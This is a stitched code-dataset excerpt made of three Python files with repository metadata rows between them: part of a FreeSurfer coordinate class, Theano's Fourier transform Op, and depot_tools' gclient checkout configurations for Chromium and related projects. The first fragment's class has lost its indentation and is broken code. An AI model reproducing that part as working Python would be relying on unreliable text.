        affineM = self._to_affine_matrix(coords)
        self.coordinates['ras_tkr_coord'] = np.dot(self.fsvox2ras_tkr,np.dot(self.ras2fsvox, affineM)).T[:,:3]
        self.coordinates['fsvoxel_coord'] = np.round(np.dot(self.ras2fsvox,affineM).T[:,:3])
        # In this space the code treats the input RAS coords as the talairach
        # coords, and the Freesurfer voxel coords as the plain voxel coords.
        self.coordinates['talairach_coord'] = self.coordinates['ras_coord']
        self.coordinates['voxel_coord'] = self.coordinates['fsvoxel_coord']

        ## guessing hemisphere
        if guess_hemi:
            self._guess_hemi()

        ## adding traits
        self.traits_list = []
        for trait in traits:
            self.add_trait(trait, traits[trait])
class _FreesurferCoord(object):
def __init__(self,ras_coord, voxel_coord, ras_tkr_coord, fsvoxel_coord, talairach_coord, hemi, **kwargs):
self.ras_coord = ras_coord
self.voxel_coord = voxel_coord
self.ras_tkr_coord = ras_tkr_coord
self.fsvoxel_coord = fsvoxel_coord
self.talairach_coord = talairach_coord
self.hemi = hemi
self.traits_list = []
for trait,value in kwargs.items():
self.__setattr__(trait, value)
self.traits_list.append(trait)
def add_trait(self, trait, value):
self.__setattr__(trait,value)
if trait not in self.traits_list:
self.traits_list.append(trait)
| 39.348249 | 226 | 0.563906 |
7b4bd8538a76e2e4eea9b3a1b2908f033206b438 | 6,383 | py | Python | theano/tensor/fourier.py | mdda/Theano | 6ca7b2b65000e371f009b617d41bc5a90f022d38 | [
"BSD-3-Clause"
] | 295 | 2015-09-25T21:15:04.000Z | 2022-01-13T01:16:18.000Z | libs/Theano/theano/tensor/fourier.py | shenshenzhanzhan/attention-lvcsr | 598d487c118e66875fdd625baa84ed29d283b800 | [
"MIT"
] | 21 | 2015-10-28T19:06:32.000Z | 2022-03-11T23:13:05.000Z | libs/Theano/theano/tensor/fourier.py | shenshenzhanzhan/attention-lvcsr | 598d487c118e66875fdd625baa84ed29d283b800 | [
"MIT"
] | 114 | 2015-09-26T21:23:02.000Z | 2021-11-19T02:36:41.000Z | import numpy
import math
from theano import gof, tensor
class Fourier(gof.Op):
    """
    An instance of this class returns a finite fourier transform calcutated
    along one dimension of an input array.

    inputs:

    a : Array of at least one dimension.  Can be complex.
    n : Integer, optional.  Length of the transformed axis of the output.  If n
    is smaller than the length of the input, the input is cropped.  If it is
    larger, the input is padded with zeros.  If n is not given, the length of
    the input (along the axis specified by axis) is used.
    axis : Integer, optional.  Axis over which to compute the FFT.  If not
    supplied, the last axis is used.

    output:

    Complex array.  The input array, transformed along the axis
    indicated by 'axis' or along the last axis if 'axis' is not specified.  It
    is truncated or zero-padded as required if 'n' is specified.

    (From numpy.fft.fft's documentation:)

    The values in the output follow so-called standard order.  If A = fft(a, n),
    then A[0] contains the zero-frequency term (the mean of the signal), which
    is always purely real for real inputs.  Then A[1:n/2] contains the
    positive-frequency terms, and A[n/2+1:] contains the negative-frequency
    terms, in order of decreasingly negative frequency.  For an even number of
    input points, A[n/2] represents both positive and negative Nyquist
    frequency, and is also purely real for real input.  For an odd number of
    input points, A[(n-1)/2] contains the largest positive frequency, while
    A[(n+1)/2] contains the largest negative frequency.
    """

    # No parameters beyond the inputs; all instances compare equal.
    __props__ = ()

    def make_node(self, a, n, axis):
        # Validate/convert the three inputs and build the Apply node.  The
        # output is always complex128 with the input's broadcastable pattern.
        a = tensor.as_tensor_variable(a)
        if a.ndim < 1:
            raise TypeError('%s: input must be an array, not a scalar' %
                            self.__class__.__name__)
        if axis is None:
            # Default: transform along the last axis.
            axis = a.ndim - 1
            axis = tensor.as_tensor_variable(axis)
        else:
            axis = tensor.as_tensor_variable(axis)
            if (not axis.dtype.startswith('int')) and \
               (not axis.dtype.startswith('uint')):
                raise TypeError('%s: index of the transformed axis must be'
                                ' of type integer' % self.__class__.__name__)
            elif axis.ndim != 0 or (isinstance(axis, tensor.TensorConstant) and
                                    (axis.data < 0 or axis.data > a.ndim - 1)):
                raise TypeError('%s: index of the transformed axis must be'
                                ' a scalar not smaller than 0 and smaller than'
                                ' dimension of array' % self.__class__.__name__)
        if n is None:
            # Default: use the input's length along the transformed axis.
            n = a.shape[axis]
            n = tensor.as_tensor_variable(n)
        else:
            n = tensor.as_tensor_variable(n)
            if (not n.dtype.startswith('int')) and \
               (not n.dtype.startswith('uint')):
                raise TypeError('%s: length of the transformed axis must be'
                                ' of type integer' % self.__class__.__name__)
            elif n.ndim != 0 or (isinstance(n, tensor.TensorConstant) and
                                 n.data < 1):
                raise TypeError('%s: length of the transformed axis must be a'
                                ' strictly positive scalar'
                                % self.__class__.__name__)
        return gof.Apply(self, [a, n, axis], [tensor.TensorType('complex128',
                         a.type.broadcastable)()])

    def infer_shape(self, node, in_shapes):
        # Output shape equals the input shape with size n substituted at the
        # transformed axis.
        shape_a = in_shapes[0]
        n = node.inputs[1]
        axis = node.inputs[2]
        if len(shape_a) == 1:
            return [(n,)]
        elif isinstance(axis, tensor.TensorConstant):
            out_shape = (list(shape_a[0: axis.data.item()]) + [n] +
                         list(shape_a[axis.data + 1:]))
        else:
            # Axis only known symbolically: splice n in with tensor ops.
            l = len(shape_a)
            shape_a = tensor.stack(shape_a)
            out_shape = tensor.concatenate((shape_a[0: axis], [n],
                                            shape_a[axis + 1:]))
            n_splits = [1] * l
            out_shape = tensor.split(out_shape, n_splits, l)
            out_shape = [a[0] for a in out_shape]
        return [out_shape]

    def perform(self, node, inputs, output_storage):
        # Numeric evaluation simply delegates to numpy's FFT.
        a = inputs[0]
        n = inputs[1]
        axis = inputs[2]
        output_storage[0][0] = numpy.fft.fft(a, n=int(n), axis=axis.item())

    def grad(self, inputs, cost_grad):
        """
        In defining the gradient, the Finite Fourier Transform is viewed as
        a complex-differentiable function of a complex variable
        """
        a = inputs[0]
        n = inputs[1]
        axis = inputs[2]
        grad = cost_grad[0]
        if not isinstance(axis, tensor.TensorConstant):
            raise NotImplementedError('%s: gradient is currently implemented'
                                      ' only for axis being a Theano constant'
                                      % self.__class__.__name__)
        axis = int(axis.data)
        # notice that the number of actual elements in wrto is independent of
        # possible padding or truncation:
        elem = tensor.arange(0, tensor.shape(a)[axis], 1)
        # accounts for padding:
        freq = tensor.arange(0, n, 1)
        outer = tensor.outer(freq, elem)
        # DFT matrix exp(-2*pi*i*f*e/n); grad contracts against it.
        pow_outer = tensor.exp(((-2 * math.pi * 1j) * outer) / (1. * n))
        res = tensor.tensordot(grad, pow_outer, (axis, 0))
        # This would be simpler but not implemented by theano:
        # res = tensor.switch(tensor.lt(n, tensor.shape(a)[axis]),
        # tensor.set_subtensor(res[...,n::], 0, False, False), res)
        # Instead we resort to that to account for truncation:
        flip_shape = list(numpy.arange(0, a.ndim)[::-1])
        res = res.dimshuffle(flip_shape)
        res = tensor.switch(tensor.lt(n, tensor.shape(a)[axis]),
                            tensor.set_subtensor(res[n::, ], 0, False, False),
                            res)
        res = res.dimshuffle(flip_shape)
        # insures that gradient shape conforms to input shape:
        out_shape = list(numpy.arange(0, axis)) + [a.ndim - 1] +\
            list(numpy.arange(axis, a.ndim - 1))
        res = res.dimshuffle(*out_shape)
        # n and axis are integer parameters: no gradient flows to them.
        return [res, None, None]
fft = Fourier()  # module-level singleton instance of the Op
| 44.636364 | 80 | 0.573085 |
b8152734b11bf7d14fdc6d71af65103a2719b4d7 | 23,145 | py | Python | depot_tools/recipe_modules/gclient/config.py | bopopescu/MQUIC | 703e944ec981366cfd2528943b1def2c72b7e49d | [
"MIT"
] | 1 | 2018-01-02T15:42:08.000Z | 2018-01-02T15:42:08.000Z | depot_tools/recipe_modules/gclient/config.py | bopopescu/MQUIC | 703e944ec981366cfd2528943b1def2c72b7e49d | [
"MIT"
] | null | null | null | depot_tools/recipe_modules/gclient/config.py | bopopescu/MQUIC | 703e944ec981366cfd2528943b1def2c72b7e49d | [
"MIT"
] | 1 | 2020-07-25T02:05:49.000Z | 2020-07-25T02:05:49.000Z | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import types
from recipe_engine.config import config_item_context, ConfigGroup, BadConf
from recipe_engine.config import ConfigList, Dict, Single, Static, Set, List
from . import api as gclient_api
def BaseConfig(USE_MIRROR=True, GIT_MODE=False, CACHE_DIR=None,
               PATCH_PROJECT=None, BUILDSPEC_VERSION=None,
               **_kwargs):
  """Return the base gclient config schema.

  All named @config_ctx functions below mutate a copy of this schema.
  USE_MIRROR selects golo svn mirrors; GIT_MODE switches DEPS file name and
  enables the git cache dir.
  """
  # Git checkouts pin deps via .DEPS.git; svn checkouts use plain DEPS.
  deps = '.DEPS.git' if GIT_MODE else 'DEPS'
  cache_dir = str(CACHE_DIR) if GIT_MODE and CACHE_DIR else None
  return ConfigGroup(
    solutions = ConfigList(
      lambda: ConfigGroup(
        name = Single(basestring),
        url = Single(basestring),
        deps_file = Single(basestring, empty_val=deps, required=False,
                           hidden=False),
        managed = Single(bool, empty_val=True, required=False, hidden=False),
        custom_deps = Dict(value_type=(basestring, types.NoneType)),
        custom_vars = Dict(value_type=basestring),
        safesync_url = Single(basestring, required=False),
        revision = Single(
            (basestring, gclient_api.RevisionResolver),
            required=False, hidden=True),
      )
    ),
    deps_os = Dict(value_type=basestring),
    hooks = List(basestring),
    target_os = Set(basestring),
    target_os_only = Single(bool, empty_val=False, required=False),
    cache_dir = Static(cache_dir, hidden=False),
    # If supplied, use this as the source root (instead of the first solution's
    # checkout).
    src_root = Single(basestring, required=False, hidden=True),
    # Maps 'solution' -> build_property
    got_revision_mapping = Dict(hidden=True),
    # Addition revisions we want to pass in.  For now theres a duplication
    # of code here of setting custom vars AND passing in --revision. We hope
    # to remove custom vars later.
    revisions = Dict(
        value_type=(basestring, gclient_api.RevisionResolver),
        hidden=True),
    # TODO(iannucci): HACK! The use of None here to indicate that we apply this
    #   to the solution.revision field is really terrible. I mostly blame
    #   gclient.
    # Maps 'parent_build_property' -> 'custom_var_name'
    # Maps 'parent_build_property' -> None
    # If value is None, the property value will be applied to
    # solutions[0].revision. Otherwise, it will be applied to
    # solutions[0].custom_vars['custom_var_name']
    parent_got_revision_mapping = Dict(hidden=True),
    delete_unversioned_trees = Single(bool, empty_val=True, required=False),
    # Check out refs/branch-heads.
    # TODO (machenbach): Only implemented for bot_update atm.
    with_branch_heads = Single(
        bool,
        empty_val=False,
        required=False,
        hidden=True),
    GIT_MODE = Static(bool(GIT_MODE)),
    USE_MIRROR = Static(bool(USE_MIRROR)),
    PATCH_PROJECT = Static(str(PATCH_PROJECT), hidden=True),
    BUILDSPEC_VERSION= Static(BUILDSPEC_VERSION, hidden=True),
  )
# Decorator factory: @config_ctx(...) registers named config mutators that
# build on BaseConfig.
config_ctx = config_item_context(BaseConfig)
def ChromiumSvnSubURL(c, *pieces):
  """Join *pieces* onto the chromium svn host (mirror when USE_MIRROR)."""
  base = ('https://src.chromium.org',
          'svn://svn-mirror.golo.chromium.org')[c.USE_MIRROR]
  return '/'.join((base,) + pieces)
def ChromiumGitURL(_c, *pieces):
  """Join *pieces* onto the chromium googlesource host (config unused)."""
  url_parts = ('https://chromium.googlesource.com',) + pieces
  return '/'.join(url_parts)
def ChromiumSrcURL(c):
  """Return the Chromium src checkout URL for the configured VCS mode."""
  # TODO(phajdan.jr): Move to proper repo and add coverage.
  if c.GIT_MODE: # pragma: no cover
    return ChromiumGitURL(c, 'chromium', 'src.git')
  else:
    return ChromiumSvnSubURL(c, 'chrome', 'trunk', 'src')
def BlinkURL(c):
  """Return the Blink checkout URL for the configured VCS mode."""
  # TODO(phajdan.jr): Move to proper repo and add coverage.
  if c.GIT_MODE: # pragma: no cover
    return ChromiumGitURL(c, 'chromium', 'blink.git')
  else:
    return ChromiumSvnSubURL(c, 'blink', 'trunk')
def ChromeSvnSubURL(c, *pieces):
  """Join *pieces* onto the chrome svn host (mirror when USE_MIRROR)."""
  base = ('svn://svn.chromium.org',
          'svn://svn-mirror.golo.chromium.org')[c.USE_MIRROR]
  return '/'.join((base,) + pieces)
# TODO(phajdan.jr): Move to proper repo and add coverage.
def ChromeInternalGitURL(_c, *pieces): # pragma: no cover
  """Join *pieces* onto the chrome-internal googlesource host."""
  url_parts = ('https://chrome-internal.googlesource.com',) + pieces
  return '/'.join(url_parts)
def ChromeInternalSrcURL(c):
  """Return the src-internal checkout URL for the configured VCS mode."""
  # TODO(phajdan.jr): Move to proper repo and add coverage.
  if c.GIT_MODE: # pragma: no cover
    return ChromeInternalGitURL(c, 'chrome', 'src-internal.git')
  else:
    return ChromeSvnSubURL(c, 'chrome-internal', 'trunk', 'src-internal')
def mirror_only(c, obj, default=None):
  """Return *obj* when mirrors are enabled; otherwise *default*, falling
  back to an empty instance of obj's type when default is falsy."""
  if c.USE_MIRROR:
    return obj
  return default if default else obj.__class__()
@config_ctx()
def chromium_bare(c):
  """Single-solution chromium src checkout with standard revision mappings."""
  s = c.solutions.add()
  s.name = 'src'
  s.url = ChromiumSrcURL(c)
  s.custom_vars = mirror_only(c, {
    'googlecode_url': 'svn://svn-mirror.golo.chromium.org/%s',
    'nacl_trunk': 'svn://svn-mirror.golo.chromium.org/native_client/trunk',
    'sourceforge_url': 'svn://svn-mirror.golo.chromium.org/%(repo)s',
    'webkit_trunk': BlinkURL(c)})
  # checkout path -> build property that records its synced revision
  m = c.got_revision_mapping
  m['src'] = 'got_revision'
  m['src/native_client'] = 'got_nacl_revision'
  m['src/tools/swarming_client'] = 'got_swarming_client_revision'
  m['src/v8'] = 'got_v8_revision'
  m['src/third_party/angle'] = 'got_angle_revision'
  m['src/third_party/webrtc'] = 'got_webrtc_revision'

  # parent build property -> custom var applied on the first solution
  p = c.parent_got_revision_mapping
  p['parent_got_revision'] = None
  p['parent_got_angle_revision'] = 'angle_revision'
  p['parent_got_nacl_revision'] = 'nacl_revision'
  p['parent_got_swarming_client_revision'] = 'swarming_revision'
  p['parent_got_v8_revision'] = 'v8_revision'
  p['parent_got_webrtc_revision'] = 'webrtc_revision'

  # Patch project revisions are applied whenever patch_project is set. E.g. if
  # a v8 stand-alone patch is sent to a chromium trybot, patch_project is v8
  # and can be used to sync v8 to HEAD instead of the pinned chromium
  # version.
  patch_project_revisions = {
    'v8': ('src/v8', 'HEAD'),
  }

  patch_revision = patch_project_revisions.get(c.PATCH_PROJECT)
  # TODO(phajdan.jr): Move to proper repo and add coverage.
  if patch_revision: # pragma: no cover
    c.revisions[patch_revision[0]] = patch_revision[1]
@config_ctx(includes=['chromium_bare'])
def chromium_empty(c):
  # Empty deps_file: sync only the top-level solution, no DEPS expansion.
  c.solutions[0].deps_file = '' # pragma: no cover
@config_ctx(includes=['chromium_bare'])
def chromium(c):
  """Standard chromium checkout; custom_deps only populated on mirrors."""
  s = c.solutions[0]
  s.custom_deps = mirror_only(c, {})
@config_ctx(includes=['chromium'])
def chromium_lkcr(c):
# TODO(phajdan.jr): Add git hashes for LKCR crbug.com/349277.
if c.GIT_MODE:
raise BadConf('Git has problems with safesync_url and LKCR, '
'crbug.com/349277 crbug.com/109191') # pragma: no cover
s = c.solutions[0]
s.safesync_url = 'https://build.chromium.org/p/chromium/lkcr-status/lkgr'
# TODO(hinoka): Once lkcr exists and is a tag, it should just be lkcr
# rather than origin/lkcr.
s.revision = 'origin/lkcr'
@config_ctx(includes=['chromium'])
def chromium_lkgr(c):
s = c.solutions[0]
safesync_url = 'https://chromium-status.appspot.com/lkgr'
if c.GIT_MODE: # pragma: no cover
safesync_url = 'https://chromium-status.appspot.com/git-lkgr'
raise BadConf('Git has problems with safesync_url, crbug.com/109191.')
s.safesync_url = safesync_url
s.revision = 'origin/lkgr'
@config_ctx(includes=['chromium_bare'])
def android_bare(c):
# We inherit from chromium_bare to get the got_revision mapping.
# NOTE: We don't set a specific got_revision mapping for src/repo.
del c.solutions[0]
c.got_revision_mapping['src'] = 'got_src_revision'
s = c.solutions.add()
s.deps_file = '.DEPS.git'
# TODO(iannucci,vadimsh): Switch this to src-limited
@config_ctx()
def chrome_internal(c):
s = c.solutions.add()
s.name = 'src-internal'
s.url = ChromeInternalSrcURL(c)
# Remove some things which are generally not needed
s.custom_deps = {
"src/data/autodiscovery" : None,
"src/data/page_cycler" : None,
"src/tools/grit/grit/test/data" : None,
"src/chrome/test/data/perf/frame_rate/private" : None,
"src/data/mozilla_js_tests" : None,
"src/chrome/test/data/firefox2_profile/searchplugins" : None,
"src/chrome/test/data/firefox2_searchplugins" : None,
"src/chrome/test/data/firefox3_profile/searchplugins" : None,
"src/chrome/test/data/firefox3_searchplugins" : None,
"src/chrome/test/data/ssl/certs" : None,
"src/data/mach_ports" : None,
"src/data/esctf" : None,
"src/data/selenium_core" : None,
"src/chrome/test/data/plugin" : None,
"src/data/memory_test" : None,
"src/data/tab_switching" : None,
"src/chrome/test/data/osdd" : None,
"src/webkit/data/bmp_decoder":None,
"src/webkit/data/ico_decoder":None,
"src/webkit/data/test_shell/plugins":None,
"src/webkit/data/xbm_decoder":None,
}
@config_ctx(includes=['chromium'])
def blink(c):
c.solutions[0].revision = 'HEAD'
del c.solutions[0].custom_deps
c.revisions['src/third_party/WebKit'] = 'HEAD'
@config_ctx(includes=['chromium'])
def blink_or_chromium(c):
c.solutions[0].revision = gclient_api.ProjectRevisionResolver('chromium')
del c.solutions[0].custom_deps
c.revisions['src/third_party/WebKit'] = \
gclient_api.ProjectRevisionResolver(
'webkit', parent_got_revision='parent_got_webkit_revision')
# TODO(phajdan.jr): Move to proper repo and add coverage.
@config_ctx(includes=['chromium'])
def blink_merged(c): # pragma: no cover
c.solutions[0].url = \
'https://chromium.googlesource.com/playground/chromium-blink-merge.git'
@config_ctx()
def android(c):
c.target_os.add('android')
@config_ctx(includes=['chromium', 'chrome_internal'])
def ios(c):
c.target_os.add('ios')
@config_ctx(includes=['chromium'])
def show_v8_revision(c):
# Have the V8 revision appear in the web UI instead of Chromium's.
c.got_revision_mapping['src'] = 'got_cr_revision'
c.got_revision_mapping['src/v8'] = 'got_revision'
# Needed to get the testers to properly sync the right revision.
c.parent_got_revision_mapping['parent_got_revision'] = 'got_revision'
@config_ctx(includes=['chromium'])
def v8_bleeding_edge_git(c):
c.solutions[0].revision = 'HEAD'
# TODO(machenbach): If bot_update is activated for all v8-chromium bots
# and there's no gclient fallback, then the following line can be removed.
c.solutions[0].custom_vars['v8_branch'] = 'branches/bleeding_edge'
c.revisions['src/v8'] = 'HEAD'
@config_ctx()
def v8_canary(c):
c.revisions['src/v8'] = 'origin/canary'
@config_ctx(includes=['chromium'])
def oilpan(c): # pragma: no cover
if c.GIT_MODE:
raise BadConf("Oilpan requires SVN for now")
c.solutions[0].custom_vars = {
'webkit_trunk': ChromiumSvnSubURL(c, 'blink', 'branches', 'oilpan')
}
c.solutions[0].custom_vars['sourceforge_url'] = mirror_only(
c,
'svn://svn-mirror.golo.chromium.org/%(repo)s',
'svn://svn.chromium.org/%(repo)s'
)
c.revisions['src/third_party/WebKit'] = 'HEAD'
c.solutions[0].revision = '197341'
c.solutions[0].custom_deps = {
'src/chrome/tools/test/reference_build/chrome_linux' :
ChromiumSvnSubURL(c, 'blink', 'branches', 'oilpan', 'Tools',
'reference_build', 'chrome_linux')
}
del c.got_revision_mapping['src']
c.got_revision_mapping['src/third_party/WebKit/Source'] = 'got_revision'
@config_ctx(includes=['oilpan', 'chrome_internal'])
def oilpan_internal(c): # pragma: no cover
# Add back the oilpan data dependencies
needed_components_internal = [
"src/data/memory_test",
"src/data/mozilla_js_tests",
"src/data/page_cycler",
"src/data/tab_switching",
"src/webkit/data/bmp_decoder",
"src/webkit/data/ico_decoder",
"src/webkit/data/test_shell/plugins",
"src/webkit/data/xbm_decoder",
]
for key in needed_components_internal:
del c.solutions[1].custom_deps[key]
@config_ctx()
def nacl(c):
s = c.solutions.add()
s.name = 'native_client'
s.url = ChromiumGitURL(c, 'native_client', 'src', 'native_client.git')
m = c.got_revision_mapping
m['native_client'] = 'got_revision'
@config_ctx()
def webports(c):
s = c.solutions.add()
s.name = 'src'
s.url = ChromiumGitURL(c, 'webports.git')
m = c.got_revision_mapping
m['src'] = 'got_revision'
@config_ctx()
def wasm_llvm(c):
s = c.solutions.add()
s.name = 'src'
s.url = ChromiumGitURL(
c, 'external', 'github.com', 'WebAssembly', 'waterfall.git')
m = c.got_revision_mapping
m['src'] = 'got_waterfall_revision'
c.revisions['src'] = 'origin/master'
@config_ctx()
def gyp(c):
s = c.solutions.add()
s.name = 'gyp'
s.url = ChromiumGitURL(c, 'external', 'gyp.git')
m = c.got_revision_mapping
m['gyp'] = 'got_revision'
@config_ctx(config_vars={'GIT_MODE': True})
def build(c): # pragma: no cover
if not c.GIT_MODE:
raise BadConf('build only supports git')
s = c.solutions.add()
s.name = 'build'
s.url = ChromiumGitURL(c, 'chromium', 'tools', 'build.git')
m = c.got_revision_mapping
m['build'] = 'got_revision'
@config_ctx(config_vars={'GIT_MODE': True})
def depot_tools(c): # pragma: no cover
if not c.GIT_MODE:
raise BadConf('depot_tools only supports git')
s = c.solutions.add()
s.name = 'depot_tools'
s.url = ChromiumGitURL(c, 'chromium', 'tools', 'depot_tools.git')
m = c.got_revision_mapping
m['depot_tools'] = 'got_revision'
@config_ctx(config_vars={'GIT_MODE': True})
def skia(c): # pragma: no cover
if not c.GIT_MODE:
raise BadConf('skia only supports git')
s = c.solutions.add()
s.name = 'skia'
s.url = 'https://skia.googlesource.com/skia.git'
m = c.got_revision_mapping
m['skia'] = 'got_revision'
@config_ctx(config_vars={'GIT_MODE': True})
def chrome_golo(c): # pragma: no cover
if not c.GIT_MODE:
raise BadConf('chrome_golo only supports git')
s = c.solutions.add()
s.name = 'chrome_golo'
s.url = 'https://chrome-internal.googlesource.com/chrome-golo/chrome-golo.git'
c.got_revision_mapping['chrome_golo'] = 'got_revision'
@config_ctx(config_vars={'GIT_MODE': True})
def build_internal(c):
if not c.GIT_MODE: # pragma: no cover
raise BadConf('build_internal only supports git')
s = c.solutions.add()
s.name = 'build_internal'
s.url = 'https://chrome-internal.googlesource.com/chrome/tools/build.git'
c.got_revision_mapping['build_internal'] = 'got_revision'
# We do not use 'includes' here, because we want build_internal to be the
# first solution in the list as run_presubmit computes upstream revision
# from the first solution.
build(c)
c.got_revision_mapping['build'] = 'got_build_revision'
@config_ctx(config_vars={'GIT_MODE': True})
def build_internal_scripts_slave(c):
if not c.GIT_MODE: # pragma: no cover
raise BadConf('build_internal_scripts_slave only supports git')
s = c.solutions.add()
s.name = 'build_internal/scripts/slave'
s.url = ('https://chrome-internal.googlesource.com/'
'chrome/tools/build_limited/scripts/slave.git')
c.got_revision_mapping['build_internal/scripts/slave'] = 'got_revision'
# We do not use 'includes' here, because we want build_internal to be the
# first solution in the list as run_presubmit computes upstream revision
# from the first solution.
build(c)
c.got_revision_mapping['build'] = 'got_build_revision'
@config_ctx()
def master_deps(c):
s = c.solutions.add()
s.name = 'build_internal/master.DEPS'
s.url = ('https://chrome-internal.googlesource.com/'
'chrome/tools/build/master.DEPS.git')
c.got_revision_mapping['build_internal/master.DEPS'] = 'got_revision'
@config_ctx()
def slave_deps(c):
s = c.solutions.add()
s.name = 'build_internal/slave.DEPS'
s.url = ('https://chrome-internal.googlesource.com/'
'chrome/tools/build/slave.DEPS.git')
c.got_revision_mapping['build_internal/slave.DEPS'] = 'got_revision'
@config_ctx()
def internal_deps(c):
s = c.solutions.add()
s.name = 'build_internal/internal.DEPS'
s.url = ('https://chrome-internal.googlesource.com/'
'chrome/tools/build/internal.DEPS.git')
c.got_revision_mapping['build_internal/internal.DEPS'] = 'got_revision'
@config_ctx(includes=['chromium', 'chrome_internal'])
def perf(c):
s = c.solutions[0]
s.custom_vars['llvm_url'] = 'svn://svn-mirror.golo.chromium.org/llvm-project'
s.managed = False
needed_components_internal = [
"src/data/page_cycler",
]
for key in needed_components_internal:
del c.solutions[1].custom_deps[key]
c.solutions[1].managed = False
@config_ctx(includes=['chromium'])
def chromium_skia(c):
c.solutions[0].revision = 'HEAD'
del c.solutions[0].custom_deps
c.revisions['src/third_party/skia'] = (
gclient_api.RevisionFallbackChain('origin/master'))
c.got_revision_mapping['src'] = 'got_chromium_revision'
c.got_revision_mapping['src/third_party/skia'] = 'got_revision'
c.parent_got_revision_mapping['parent_got_revision'] = 'got_revision'
@config_ctx(includes=['chromium'])
def chromium_webrtc(c):
c.got_revision_mapping['src/third_party/libjingle/source/talk'] = (
'got_libjingle_revision')
c.got_revision_mapping['src/third_party/libvpx/source'] = (
'got_libvpx_revision')
@config_ctx(includes=['chromium_webrtc'])
def chromium_webrtc_tot(c):
"""Configures ToT revisions for WebRTC and Libjingle for Chromium.
Sets up ToT instead of the DEPS-pinned revision for WebRTC and Libjingle.
This is used for some bots to provide data about which revisions are green to
roll into Chromium.
"""
c.revisions['src'] = 'HEAD'
c.revisions['src/third_party/webrtc'] = 'HEAD'
c.revisions['src/third_party/libjingle/source/talk'] = 'HEAD'
@config_ctx()
def webrtc_test_resources(c):
"""Add webrtc.DEPS solution for test resources and tools.
The webrtc.DEPS solution pulls in additional resources needed for running
WebRTC-specific test setups in Chromium.
"""
s = c.solutions.add()
s.name = 'webrtc.DEPS'
s.url = ChromiumGitURL(c, 'chromium', 'deps', 'webrtc', 'webrtc.DEPS')
s.deps_file = 'DEPS'
@config_ctx()
def pdfium(c):
soln = c.solutions.add()
soln.name = 'pdfium'
soln.url = 'https://pdfium.googlesource.com/pdfium.git'
@config_ctx()
def mojo(c):
soln = c.solutions.add()
soln.name = 'src'
soln.url = 'https://chromium.googlesource.com/external/mojo.git'
@config_ctx()
def crashpad(c):
soln = c.solutions.add()
soln.name = 'crashpad'
soln.url = 'https://chromium.googlesource.com/crashpad/crashpad.git'
@config_ctx()
def boringssl(c):
soln = c.solutions.add()
soln.name = 'boringssl'
soln.url = 'https://boringssl.googlesource.com/boringssl.git'
soln.deps_file = 'util/bot/DEPS'
@config_ctx()
def dart(c):
soln = c.solutions.add()
soln.name = 'sdk'
soln.url = ('https://chromium.googlesource.com/external/github.com/' +
'dart-lang/sdk.git')
soln.deps_file = 'DEPS'
soln.managed = False
@config_ctx(config_vars={'GIT_MODE': True})
def infra(c):
soln = c.solutions.add()
soln.name = 'infra'
soln.url = 'https://chromium.googlesource.com/infra/infra.git'
c.got_revision_mapping['infra'] = 'got_revision'
@config_ctx(config_vars={'GIT_MODE': True})
def infra_internal(c): # pragma: no cover
soln = c.solutions.add()
soln.name = 'infra_internal'
soln.url = 'https://chrome-internal.googlesource.com/infra/infra_internal.git'
c.got_revision_mapping['infra_internal'] = 'got_revision'
@config_ctx(includes=['infra'])
def luci_gae(c):
# luci/gae is checked out as a part of infra.git solution at HEAD.
c.revisions['infra'] = 'origin/master'
# luci/gae is developed together with luci-go, which should be at HEAD.
c.revisions['infra/go/src/github.com/luci/luci-go'] = 'origin/master'
c.revisions['infra/go/src/github.com/luci/gae'] = (
gclient_api.RevisionFallbackChain('origin/master'))
m = c.got_revision_mapping
del m['infra']
m['infra/go/src/github.com/luci/gae'] = 'got_revision'
@config_ctx(includes=['infra'])
def luci_go(c):
# luci-go is checked out as a part of infra.git solution at HEAD.
c.revisions['infra'] = 'origin/master'
c.revisions['infra/go/src/github.com/luci/luci-go'] = (
gclient_api.RevisionFallbackChain('origin/master'))
m = c.got_revision_mapping
del m['infra']
m['infra/go/src/github.com/luci/luci-go'] = 'got_revision'
@config_ctx(includes=['infra'])
def luci_py(c):
# luci-py is checked out as part of infra just to have appengine
# pre-installed, as that's what luci-py PRESUBMIT relies on.
c.revisions['infra'] = 'origin/master'
c.revisions['infra/luci'] = (
gclient_api.RevisionFallbackChain('origin/master'))
m = c.got_revision_mapping
del m['infra']
m['infra/luci'] = 'got_revision'
@config_ctx(includes=['infra'])
def recipes_py(c):
c.revisions['infra'] = 'origin/master'
c.revisions['infra/recipes-py'] = (
gclient_api.RevisionFallbackChain('origin/master'))
m = c.got_revision_mapping
del m['infra']
m['infra/recipes-py'] = 'got_revision'
@config_ctx()
def chrome_from_buildspec(c):  # pragma: no cover
  # SVN-based checkout of an internal Chrome buildspec.
  soln = c.solutions.add()
  soln.name = 'chrome_from_buildspec'
  # This URL has to be augmented with the appropriate bucket by the recipe using
  # it.
  soln.url = ('svn://svn-mirror.golo.chromium.org/chrome-internal/trunk/tools/'
              'buildspec/build/')
  soln.custom_vars['svn_url'] = 'svn://svn-mirror.golo.chromium.org'
  soln.custom_deps = {}
@config_ctx()
def catapult(c):
  # Standalone checkout of the catapult project mirror.
  soln = c.solutions.add()
  soln.name = 'catapult'
  soln.url = ('https://chromium.googlesource.com/external/github.com/'
              'catapult-project/catapult.git')
  c.got_revision_mapping['catapult'] = 'got_revision'
@config_ctx(includes=['infra_internal'], config_vars={'GIT_MODE': True})
def infradata_master_manager(c):
  # Adds the internal master-manager data repo on top of infra_internal.
  soln = c.solutions.add()
  soln.name = 'infra-data-master-manager'
  soln.url = (
      'https://chrome-internal.googlesource.com/infradata/master-manager.git')
  c.got_revision_mapping['infra-data-master-manager'] = 'got_revision'
@config_ctx()
def with_branch_heads(c):
  # Opt-in flag: also fetch the branch-heads refs during sync.
  c.with_branch_heads = True
@config_ctx()
def custom_tabs_client(c):
  # Standalone checkout of the custom-tabs-client GitHub mirror.
  soln = c.solutions.add()
  soln.name = 'custom_tabs_client'
  # TODO(pasko): test custom-tabs-client within a full chromium checkout.
  soln.url = ('https://chromium.googlesource.com/external/github.com/'
              'GoogleChrome/custom-tabs-client.git')
  c.got_revision_mapping['custom_tabs_client'] = 'got_revision'
# TODO(phajdan.jr): Move to proper repo and add coverage.
@config_ctx()
def angle_top_of_tree(c):  # pragma: no cover
  """Configures the top-of-tree ANGLE in a Chromium checkout.

  Sets up ToT instead of the DEPS-pinned revision for ANGLE.
  """
